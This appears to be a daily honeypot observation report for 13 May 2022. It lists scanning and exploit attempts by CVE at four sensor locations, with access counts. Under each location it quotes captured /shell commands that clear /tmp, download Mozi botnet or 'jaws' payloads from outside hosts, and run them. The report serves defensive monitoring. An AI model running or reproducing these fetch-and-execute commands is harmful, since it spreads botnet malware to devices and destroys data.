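This is the Honeypot (tentative) observation record for 2022/05/13.
Characteristics
Common
Accesses targeting the Apache HTTP Server vulnerability (CVE-2021-41773)
Accesses targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Accesses targeting the PHPUnit vulnerability (CVE-2017-9841)
Accesses targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning by zgrab
Scanning for .js
Scanning for /.aws
Scanning for /.env
Scanning for Laravel
Location:JP
Accesses targeting the Apache Log4j2 vulnerability (CVE-2021-44228)
Accesses targeting Apache Struts 2 vulnerabilities
Accesses targeting the BIG-IP product vulnerability (CVE-2020-5902)
Accesses targeting vulnerabilities in D-Link products
Accesses targeting vulnerabilities in GPON routers
Accesses targeting the Linear eMerge E3 vulnerability (CVE-2019-7256)
Accesses targeting the Lucee Admin vulnerability (CVE-2021-21307)
Accesses targeting the Maian Cart vulnerability (CVE-2021-32172)
Accesses targeting the OpenAM vulnerability (CVE-2021-35464)
Accesses targeting OpenDreamBox vulnerabilities
Accesses targeting the Oracle WebLogic vulnerability (CVE-2017-3506)
Accesses targeting the Oracle WebLogic vulnerability (CVE-2018-2894)
Accesses targeting the Oracle WebLogic vulnerability (CVE-2019-2725)
Accesses targeting the RaspAP vulnerability (CVE-2021-33357)
Accesses targeting the SCIMono vulnerability (CVE-2021-21479)
Accesses targeting the ShellShock vulnerability (CVE-2014-7169)
Accesses targeting Spring Boot vulnerabilities
Accesses targeting the VMware View Planner vulnerability (CVE-2021-21978)
Accesses targeting the ZeroShell Linux distribution vulnerability (CVE-2009-0545)
Accesses targeting the ZeroShell Linux distribution vulnerability (CVE-2020-29390)
Accesses targeting the ZyXEL NAS product vulnerability (CVE-2020-9054)
Accesses targeting the fuel CMS vulnerability (CVE-2018-16763)
Accesses targeting the vBulletin vulnerability (CVE-2019-16759)
Scanning for WordPress plugins
Accesses with the UserAgent "Hello, world"
The accesses listed above were observed.
The following accesses to /shell were observed.
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Accesses targeting ThinkPHP vulnerabilities
Scanning for Apache Solr
Accesses with the UserAgent "Hello, world"
The accesses listed above were observed.
The following accesses to /shell were observed.
cd /tmp; rm -rf *; wget http://163.179.165.247:55075/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
Accesses targeting vulnerabilities in GPON routers
Accesses targeting ThinkPHP vulnerabilities
Scanning for /.git
Scanning for Apache Solr
Accesses with the UserAgent "Hello, world"
The accesses listed above were observed.
The following accesses to /shell were observed.
cd /tmp; rm -rf *; wget 209.141.59.94/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://210.89.39.75:35243/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
Accesses targeting vulnerabilities in GPON routers
Accesses targeting ThinkPHP vulnerabilities
Scanning for Apache Solr
Accesses with the UserAgent "Hello, world"
The accesses listed above were observed.
The following accesses to /shell were observed.
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget v1.kannimanelaji.com/jaws; sh /tmp/jaws
Other
Access count trend
JP: total accesses: 213 (change from previous day: 51)
US: total accesses: 80 (change from previous day: 7)
UK: total accesses: 43 (change from previous day: -105)
SG: total accesses: 66 (change from previous day: 0)
For convenience, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.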
Location:JP
Source IP address list
UserAgent list
Request list
Location:US
Source IP address list
UserAgent list
Request list
Location:UK
Source IP address list
UserAgent list
Request list
Location:SG
Source IP address list
UserAgent list
Request list